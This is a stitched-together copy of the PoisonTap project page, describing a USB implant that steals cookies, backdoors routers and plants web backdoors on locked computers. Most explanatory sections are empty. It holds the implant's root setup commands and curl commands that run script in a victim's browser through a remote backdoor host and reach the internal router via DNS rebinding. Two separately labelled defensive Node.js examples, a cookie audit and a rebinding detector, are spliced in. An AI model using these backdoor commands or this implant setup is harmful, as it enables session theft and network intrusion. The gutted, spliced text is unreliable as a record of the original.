PoisonTap - siphons cookies, exposes internal router & installs web backdoor on locked computers

Created by <a href="https://twitter.com/samykamkar" target=_blank>@SamyKamkar</a> || <a href="https://samy.pl" target=_blank>https://samy.pl</a>

When PoisonTap (<a href="http://amzn.to/2eMr2WY" target="_blank">Raspberry Pi Zero</a> & Node.js) is plugged into a locked/password-protected computer, it:

PoisonTap

(incredible HTML5 canvas animation by <a href="https://codepen.io/ara_node/" target="_blank">Ara</a>)

PoisonTap evades the following security mechanisms:


Demo

PoisonTap is built for the $5 <a href="http://amzn.to/2eMr2WY" target="_blank">Raspberry Pi Zero</a> with no additional components other than a <a href="https://amzn.to/2fUMdah" target="_blank">micro-USB cable</a> & <a href="https://amzn.to/2fWgKsd" target="_blank">microSD card</a>. It also works on any Raspberry Pi (1/2/3) with an Ethernet-to-USB/Thunderbolt dongle, or on other devices that can emulate USB gadgets, such as <a href="https://inversepath.com/usbarmory" target="_blank">USB Armory</a> and <a href="https://lanturtle.com/" target=_blank>LAN Turtle</a>.

Live demonstration and more details available in the video: <a href="https://www.youtube.com/watch?v=Aatp5gCskvk" target="_blank"><img src="https://samy.pl/poisontap/ptap-thumbnail-small.png" alt="MagSpoof" border="1" /></a>

Point of Contact: <a href="https://twitter.com/samykamkar" target=_blank>@SamyKamkar</a> // <a href="https://samy.pl" target=_blank>https://samy.pl</a>

Released: November 16, 2016

Source code and download: <a href="https://github.com/samyk/poisontap" target=_blank>https://github.com/samyk/poisontap</a>


How PoisonTap Works

PoisonTap produces a cascading effect by exploiting the existing trust in several mechanisms of a machine and network, including USB/Thunderbolt, DHCP, DNS, and HTTP, which snowballs into information exfiltration, network access, and the installation of semi-permanent backdoors.

Network Hijacking

In a nutshell, PoisonTap performs the following:


Cookie Siphoning


Internal Router Backdoor

Remotely Accessible Web-Based Backdoors


Internal Router Backdoor & Remote Access

<img src="https://samy.pl/poisontap/pin2.png?1" alt="DNS Rebinding" />

Recap of the DNS server:

Additional Remotely Accessible Web-Based Backdoors



Securing Against PoisonTap

Server-Side Security

If you are running a web server, securing against PoisonTap is simple:
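As an added example (not code from this page or the PoisonTap repository), the following Node.js audit checks a server's response headers for the properties that decide whether a session cookie can be captured by anything sitting on the path of a plaintext HTTP request. Header names are assumed lowercase, as Node's http module presents them, with "set-cookie" as an array; the two sample responses are constructed.

```javascript
// Added example, not code from the PoisonTap page or repository: audit a
// server's response headers for the properties that decide whether a session
// cookie can be captured by anything that intercepts plaintext HTTP.
// Header names are lowercase, as Node's http module presents them, and
// "set-cookie" is an array. The two sample responses below are constructed.

// Split one Set-Cookie line into the cookie name and its attributes
// (attribute keys lowercased; valueless attributes such as Secure become true).
function parseSetCookie(line) {
  const [pair, ...rest] = line.split(';').map((s) => s.trim());
  const eqPos = pair.indexOf('=');
  const name = (eqPos === -1 ? pair : pair.slice(0, eqPos)).trim();
  const attrs = {};
  for (const item of rest) {
    if (!item) continue;
    const eq = item.indexOf('=');
    const key = (eq === -1 ? item : item.slice(0, eq)).toLowerCase();
    attrs[key] = eq === -1 ? true : item.slice(eq + 1);
  }
  return { name, attrs };
}

// max-age of a Strict-Transport-Security value, or null if absent/malformed.
function hstsMaxAge(value) {
  const m = /max-age\s*=\s*"?(\d+)"?/i.exec(value || '');
  return m ? Number(m[1]) : null;
}

// Returns a list of findings; an empty list means nothing to fix.
function auditResponse(headers) {
  const findings = [];
  for (const line of headers['set-cookie'] || []) {
    const { name, attrs } = parseSetCookie(line);
    if (!('secure' in attrs)) {
      findings.push(`${name}: no Secure flag, so the browser also sends it on http:// requests`);
    }
    if (!('httponly' in attrs)) {
      findings.push(`${name}: no HttpOnly flag, so injected script can read it`);
    }
    const sameSite = String(attrs.samesite || '').toLowerCase();
    if (sameSite !== 'lax' && sameSite !== 'strict') {
      findings.push(`${name}: SameSite not Lax/Strict, so browsers without a Lax default attach it to cross-site iframe loads`);
    }
  }
  const age = hstsMaxAge(headers['strict-transport-security']);
  if (age === null) {
    findings.push('no Strict-Transport-Security header: the browser will still issue http:// requests to this host');
  } else if (age < 31536000) {
    findings.push(`Strict-Transport-Security max-age ${age} is shorter than one year`);
  }
  return findings;
}

// Constructed sample: a plain session cookie, then the same cookie hardened.
const weakResponse = {
  'set-cookie': ['session=abc123; Path=/'],
};
const hardenedResponse = {
  'set-cookie': ['session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax'],
  'strict-transport-security': 'max-age=31536000; includeSubDomains',
};

console.log(auditResponse(weakResponse));      // four findings
console.log(auditResponse(hardenedResponse));  // []
```

Run it over the headers object your own server returns (for instance the `headers` of an `http.get` response). The point of the check is that a cookie without the Secure flag is handed to whatever answers an http:// request for the site, regardless of whether the page the user is looking at was served over HTTPS, and that without HSTS the browser will keep issuing such requests.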

Desktop Security


Download

Source code: <a href="https://github.com/samyk/poisontap" target=_blank>https://github.com/samyk/poisontap</a>


Installation / File Breakdown

Note: If the device is NOT automatically recognized as an Ethernet controller (older versions of Windows, for example), you can change the USB VID and PID in pi_startup.sh.

# Instructions adjusted from https://gist.github.com/gbaman/50b6cca61dd1c3f88f41
# Become root; everything below writes to /etc and /boot
sudo bash

# If Raspbian is from BEFORE 2016-05-10, run the next line to get a kernel with dwc2 (USB gadget) support:
BRANCH=next rpi-update

# Give the USB gadget interface (usb0) a static address; the 0.0.0.0 netmask is deliberate,
# it makes the whole IPv4 space look on-link through the Pi
echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
# Enable the dwc2 USB controller overlay and load dwc2 + g_ether (USB Ethernet gadget) at boot
echo "dtoverlay=dwc2" >> /boot/config.txt
echo -e "dwc2\ng_ether" >> /etc/modules
# Run pi_startup.sh at boot: drop the trailing "exit 0" from rc.local, then append the call
sudo sed --in-place "/exit 0/d" /etc/rc.local
echo "/bin/sh /home/pi/poisontap/pi_startup.sh" >> /etc/rc.local
# Working directory for the PoisonTap files, owned by the pi user
mkdir /home/pi/poisontap
chown -R pi /home/pi/poisontap
# DHCP server, dsniff (provides dnsspoof), screen and Node.js
apt-get update && apt-get upgrade
apt-get -y install isc-dhcp-server dsniff screen nodejs

Place dhcpd.conf in /etc/dhcp/dhcpd.conf and the rest of the files in /home/pi/poisontap, then reboot to ensure everything is working.

There are a number of <a href="https://github.com/samyk/poisontap" target=_blank>files in the repo</a>, which are used on different sides. The list:

# pop an alert in the victim's browser
curl 'http://samy.pl:1337/exec?alert("muahahahaha")'
# set a cookie on the victim
curl 'http://samy.pl:1337/exec?document.cookie="key=value"'
# force the victim to load a URL via AJAX (note, jQuery is stored inside the backdoor);
# the braces are backslash-escaped so curl does not treat them as URL globbing
curl 'http://samy.pl:1337/exec?$.get("http://192.168.0.1.ip.samy.pl/login",function(d)\{console.log(d)\})'
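The last command above reaches the internal router through a hostname that embeds the router's private address as its leading labels, the DNS rebinding shape described under "Internal Router Backdoor & Remote Access". As an added example (not from this page or the PoisonTap repository), the following Node.js detector runs over resolver log lines and flags two signals: a queried name that embeds a private or loopback IPv4 address, and a name that first resolved to a public address and later to a private one. The log line format, the domain `example.test` and every sample line are constructed for this example.

```javascript
// Added example, not from the PoisonTap page or repository: flag DNS
// rebinding-style activity in resolver logs. Two signals are checked:
//  1. a queried hostname that embeds a private/loopback IPv4 address in
//     four consecutive labels (the "<ip>.ip.<domain>" shape), and
//  2. a hostname that first resolved to a public address and later to a
//     private one (a rebind).
// The log line format and all sample lines below are constructed.

const INTERNAL_RANGES = [
  ['10.0.0.0', 8],
  ['172.16.0.0', 12],
  ['192.168.0.0', 16],
  ['127.0.0.0', 8],
  ['169.254.0.0', 16],
  ['0.0.0.0', 8],
];

// Dotted-quad string to an unsigned 32-bit number, or null if malformed.
function ipv4ToInt(s) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(s);
  if (!m) return null;
  const o = m.slice(1).map(Number);
  if (o.some((x) => x > 255)) return null;
  return ((o[0] << 24) >>> 0) + (o[1] << 16) + (o[2] << 8) + o[3];
}

function isInternalIp(s) {
  const n = ipv4ToInt(s);
  if (n === null) return false;
  return INTERNAL_RANGES.some(([base, bits]) => {
    const mask = (0xffffffff << (32 - bits)) >>> 0;
    return ((n & mask) >>> 0) === ((ipv4ToInt(base) & mask) >>> 0);
  });
}

// Returns the embedded internal address if four consecutive labels of the
// hostname form one (e.g. "192.168.0.1.ip.example.test"), else null.
function embeddedInternalIp(hostname) {
  const labels = hostname.toLowerCase().split('.');
  for (let i = 0; i + 4 <= labels.length; i++) {
    const candidate = labels.slice(i, i + 4).join('.');
    if (isInternalIp(candidate)) return candidate;
  }
  return null;
}

// Constructed log format: "<timestamp> client=<ip> query=<name> answer=<ip>"
const LINE_RE = /client=(\S+)\s+query=(\S+)\s+answer=(\S+)/;

function detectRebinding(logLines) {
  const alerts = [];
  const seenPublic = new Set(); // names that have resolved to a public address
  for (const line of logLines) {
    const m = LINE_RE.exec(line);
    if (!m) continue;
    const [, client, query, answer] = m;
    const host = query.toLowerCase();
    const embedded = embeddedInternalIp(host);
    if (embedded) alerts.push({ client, host, reason: `name embeds internal address ${embedded}` });
    if (isInternalIp(answer)) {
      if (seenPublic.has(host)) {
        alerts.push({ client, host, reason: `previously public name now resolves to ${answer}` });
      }
    } else if (ipv4ToInt(answer) !== null) {
      seenPublic.add(host);
    }
  }
  return alerts;
}

// Constructed resolver log; 10.0.0.5 stands in for the affected workstation.
const sampleLog = [
  '2020-01-01T12:00:01Z client=10.0.0.5 query=www.example.test answer=203.0.113.10',
  '2020-01-01T12:00:02Z client=10.0.0.5 query=192.168.0.1.ip.example.test answer=192.168.0.1',
  '2020-01-01T12:00:03Z client=10.0.0.5 query=app.example.test answer=203.0.113.20',
  '2020-01-01T12:00:04Z client=10.0.0.5 query=app.example.test answer=192.168.1.1',
  '2020-01-01T12:00:05Z client=10.0.0.5 query=printer.lan answer=192.168.1.50',
];

console.log(detectRebinding(sampleLog)); // two alerts: the embedded name and the rebound app.example.test
```

The second signal is the general form of the technique, so it also catches rebinding that does not use the address-in-hostname shape; the `printer.lan` line shows that a name which only ever resolves internally is left alone. A resolver that refuses to return private addresses for external names (DNS rebinding protection) removes the second signal at the source.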

Frequently Asked Questions


Contact

Point of Contact: <a href="https://twitter.com/samykamkar" target=_blank>@SamyKamkar</a>

You can see more of my projects or contact me at <a href="https://samy.pl" target=_blank>https://samy.pl</a>.